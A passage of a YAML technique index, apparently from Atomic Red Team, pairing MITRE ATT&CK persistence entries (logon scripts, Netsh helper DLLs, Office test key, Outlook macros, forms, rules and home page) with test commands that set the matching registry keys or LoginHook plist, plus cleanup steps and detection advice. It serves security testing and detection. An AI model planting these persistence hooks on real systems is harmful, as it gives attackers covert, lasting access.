" - id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-27T16:49:15.786Z' - created: '2020-01-10T16:01:15.995Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - identifier: T1037.002 - atomic_tests: - - name: Logon Scripts - Mac - auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 - description: 'Mac logon script - -' - supported_platforms: - - macos - executor: - steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. - Populate the plist with the location of your shell script\n\n sudo defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. - Create the required plist file in the target user's Preferences directory\n\n\t - \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. - Populate the plist with the location of your shell script\n\n\t defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" - name: manual - T1037.001: - technique: - id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 - description: "Adversaries may use Windows logon scripts automatically executed - at logon initialization to establish persistence. 
Windows allows logon scripts - to be run whenever a specific user or group of users log into a system.(Citation: - TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript - Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these - scripts to maintain persistence on a single system. Depending on the access - configuration of the logon scripts, either local credentials or an administrator - account may be necessary. " - name: Logon Script (Windows) - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.001 - url: https://attack.mitre.org/techniques/T1037/001 - - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx - description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved - April 27, 2016. - source_name: TechNet Logon Scripts - - source_name: Hexacorn Logon Scripts - url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ - description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part - 18. Retrieved November 15, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:03.153Z' - created: '2020-01-10T03:43:37.211Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. - - Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. 
- x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.001 - atomic_tests: - - name: Logon Scripts - auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 - description: | - Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key - that can be viewed in the Registry Editor. - supported_platforms: - - windows - input_arguments: - script_path: - description: Path to .bat file - type: String - default: "%temp%\\art.bat" - script_command: - description: Command To Execute - type: String - default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt - executor: - command: | - echo "#{script_command}" > #{script_path} - REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f - cleanup_command: | - REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 - del #{script_path} >nul 2>&1 - del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 - name: command_prompt - T1546.007: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.007 - url: https://attack.mitre.org/techniques/T1546/007 - - url: https://technet.microsoft.com/library/bb490939.aspx - description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. - source_name: TechNet Netsh - - url: https://github.com/outflankbv/NetshHelperBeacon - description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved - February 13, 2017. - source_name: Github Netsh Helper CS Beacon - - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html - description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL - DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. 
- source_name: Demaske Netsh Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Netsh Helper DLL - description: |- - Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. - - Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) - id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T18:28:07.793Z' - created: '2020-01-24T14:26:51.207Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes - in most environments. Monitor process executions and investigate any child - processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh - registry key for any new or suspicious entries that do not correlate with - known system files or benign software. 
(Citation: Demaske Netsh Persistence)' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - - DLL monitoring - x_mitre_contributors: - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1546.007 - atomic_tests: - - name: Netsh Helper DLL Registration - auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files - -' - supported_platforms: - - windows - input_arguments: - helper_file: - description: Path to DLL - type: Path - default: C:\Path\file.dll - executor: - command: 'netsh.exe add helper #{helper_file} - -' - name: command_prompt - T1037.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.003 - url: https://attack.mitre.org/techniques/T1037/003 - - source_name: Petri Logon Script AD - url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 - description: Daniel Petri. (2009, January 8). Setting up a Logon Script through - Active Directory Users and Computers in Windows Server 2008. Retrieved November - 15, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Network Logon Script - description: "Adversaries may use network logon scripts automatically executed - at logon initialization to establish persistence. Network logon scripts can - be assigned using Active Directory or Group Policy Objects.(Citation: Petri - Logon Script AD) These logon scripts run with the privileges of the user they - are assigned to. Depending on the systems within the network, initializing - one of these scripts could apply to more than one or potentially all systems. - \ \n \nAdversaries may use these scripts to maintain persistence on a network. 
- Depending on the access configuration of the logon scripts, either local credentials - or an administrator account may be necessary." - id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:25.625Z' - created: '2020-01-10T18:01:03.666Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1137: - technique: - created: '2017-12-14T16:46:06.044Z' - modified: '2020-06-25T17:48:09.417Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1137 - url: https://attack.mitre.org/techniques/T1137 - - source_name: SensePost Ruler GitHub - url: https://github.com/sensepost/ruler - description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange - services. Retrieved February 4, 2019.' - - source_name: TechNet O365 Outlook Rules - url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/ - description: Koeller, B.. (2018, February 21). Defending Against Rules and - Forms Injection. Retrieved November 5, 2019. - - source_name: CrowdStrike Outlook Forms - url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 - description: Parisi, T., et al. 
(2017, July). Using Outlook Forms for Lateral - Movement and Persistence. Retrieved February 5, 2019. - - source_name: Outlook Today Home Page - url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 - description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. - Retrieved February 5, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. - Retrieved February 4, 2019. - description: |- - Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. 
- - A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) - name: Office Application Startup - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53 - x_mitre_is_subtechnique: false - x_mitre_version: '1.2' - x_mitre_contributors: - - Nick Carr, FireEye - - Microsoft Threat Intelligence Center (MSTIC) - - Sahar Shukrun - - Praetorian - - Loic Jaquemet - - Ricardo Dias - x_mitre_data_sources: - - Mail server - - Process monitoring - - Process command-line parameters - - Windows Registry - - File monitoring - x_mitre_detection: |- - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously. - - Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. 
Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) - - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - x_mitre_permissions_required: - - User - - Administrator - x_mitre_platforms: - - Windows - - Office 365 - identifier: T1137 - atomic_tests: - - name: Office Application Startup - Outlook as a C2 - auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c - description: "As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ - \nit is possible to use Outlook Macro as a way to achieve persistance and - execute arbitrary commands. 
This transform Outlook into a C2.\nToo achieve - this two things must happened on the syste\n- The macro security registry - value must be set to '4'\n- A file called VbaProject.OTM must be created in - the Outlook Folder.\n" - supported_platforms: - - windows - executor: - command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) - echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM - cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f - del %APPDATA%\Microsoft\Outlook\VbaProject.OTM - name: command_prompt - T1137.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.001 - url: https://attack.mitre.org/techniques/T1137/001 - - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea - description: Microsoft. (n.d.). Change the Normal template (Normal.dotm). - Retrieved July 3, 2017. - source_name: Microsoft Change Normal Template - - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office - description: Austin, J. (2017, June 6). Getting Started with VBA in Office. - Retrieved July 3, 2017. - source_name: MSDN VBA in Office - - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/ - description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. - Retrieved July 3, 2017. - source_name: enigma0x3 normal.dotm - - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/ - description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. - Retrieved July 3, 2017. 
- source_name: Hexacorn Office Template Macros - - source_name: GlobalDotName Jun 2019 - url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique - description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. - - source_name: CrowdStrike Outlook Forms - url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 - description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral - Movement and Persistence. Retrieved February 5, 2019. - - source_name: Outlook Today Home Page - url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 - description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. - Retrieved February 5, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Office Template Macros - description: "Adversaries may abuse Microsoft Office templates to obtain persistence - on a compromised system. Microsoft Office contains templates that are part - of common Office applications and are used to customize styles. The base templates - within the application are used each time an application starts. (Citation: - Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications - (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base - template and used to execute code when the respective Office application starts - in order to obtain persistence. Examples for both Word and Excel have been - discovered and published. By default, Word has a Normal.dotm template created - that can be modified to include a malicious macro. 
Excel does not have a template - file created by default, but one can be added that will automatically be loaded.(Citation: - enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates - may also be stored and pulled from remote locations.(Citation: GlobalDotName - Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel - Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries - may also change the location of the base template to point to their own by - hijacking the application's search order, e.g. Word 2016 will first look for - Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, - or by modifying the GlobalDotName registry key. By modifying the GlobalDotName - registry key an adversary can specify an arbitrary location, file name, and - file extension to use for the template that will be loaded on application - startup. To abuse GlobalDotName, adversaries may first need to register the - template as a trusted document or place it in a trusted location.(Citation: - GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute - unrestricted depending on the system or enterprise security policy on use - of macros." - id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-06-25T17:48:08.916Z' - created: '2019-11-07T20:29:17.788Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: 'Many Office-related persistence mechanisms require changes - to the Registry and for binaries, files, or scripts to be written to disk - or existing files modified to include malicious scripts. Collect events related - to Registry key creation and modification for keys that could be used for - Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook - Today Home Page) Modification to base templates, like Normal.dotm, should - also be investigated since the base templates should likely not contain VBA - macros. 
Changes to the Office macro security settings should also be investigated.(Citation: - GlobalDotName Jun 2019)' - x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters - - File monitoring - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1137.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.002 - url: https://attack.mitre.org/techniques/T1137/002 - - url: http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/ - description: Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. - Retrieved July 3, 2017. - source_name: Hexacorn Office Test - - url: https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ - description: 'Falcone, R. (2016, July 20). Technical Walkthrough: Office Test - Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.' - source_name: Palo Alto Office Test Sofacy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Office Test - description: |- - Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. 
This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) - - There exist user and global Registry keys for the Office Test feature: - - * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf - * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf - - Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started. - id: attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-20T15:27:51.559Z' - created: '2019-11-07T19:44:04.475Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_system_requirements: - - Office 2007, 2010, 2013, and 2016 - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy) - - Consider monitoring Office processes for anomalous DLL loads. 
- x_mitre_data_sources: - - DLL monitoring - - Loaded DLLs - - Process monitoring - - Process command-line parameters - - File monitoring - - Windows Registry - x_mitre_platforms: - - Windows - - Office 365 - identifier: T1137.002 - atomic_tests: - - name: Office Application Startup Test Persistence - auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 - description: | - Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office - application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" - /t REG_SZ /d "#{thing_to_execute}" - -' - cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office - test\Special\Perf" - -' - name: command_prompt - T1137.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.003 - url: https://attack.mitre.org/techniques/T1137/003 - - source_name: SensePost Outlook Forms - url: https://sensepost.com/blog/2017/outlook-forms-and-shells/ - description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved - February 4, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. 
- Retrieved February 4, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Outlook Forms - description: |- - Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms) - - Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms) - id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:35:15.823Z' - created: '2019-11-07T20:06:02.624Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. 
- x_mitre_data_sources: - - Mail server - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1137.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.004 - url: https://attack.mitre.org/techniques/T1137/004 - - source_name: SensePost Outlook Home Page - url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/ - description: Stalmans, E. (2017, October 11). Outlook Home Page – Another - Ruler Vector. Retrieved February 4, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. - Retrieved February 4, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Outlook Home Page - description: | - Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) - - Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. 
Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) - id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:35:51.656Z' - created: '2019-11-07T20:09:56.536Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. - x_mitre_data_sources: - - Mail server - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Windows - - Office 365 - identifier: T1137.004 - atomic_tests: - - name: Install Outlook Home Page Persistence - auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e - description: | - This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. - - Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). 
- supported_platforms: - - windows - input_arguments: - url: - description: URL to Outlook Home Page containing the payload to execute - (can be local file:// or remote https://) - type: string - default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html - outlook_version: - description: Version of Outlook that is installed - type: string - default: 16.0 - outlook_folder: - description: Name of the Outlook folder to modify the homepage setting for - type: string - default: Inbox - executor: - name: command_prompt - elevation_required: false - command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} - /v URL /t REG_SZ /d #{url} /f - -' - cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} - /v URL /f - -' - T1137.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.005 - url: https://attack.mitre.org/techniques/T1137/005 - - source_name: SilentBreak Outlook Rules - url: https://silentbreaksecurity.com/malicious-outlook-rules/ - description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved - February 4, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. - Retrieved February 4, 2019. 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Outlook Rules - description: |- - Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules) - - Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules) - id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:36:15.923Z' - created: '2019-11-07T20:00:25.560Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. 
Non-standard process execution trees may also indicate suspicious or malicious behavior. - x_mitre_data_sources: - - Mail server - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1034: - technique: - id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception - description: |- - **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** - - Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) - - There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of 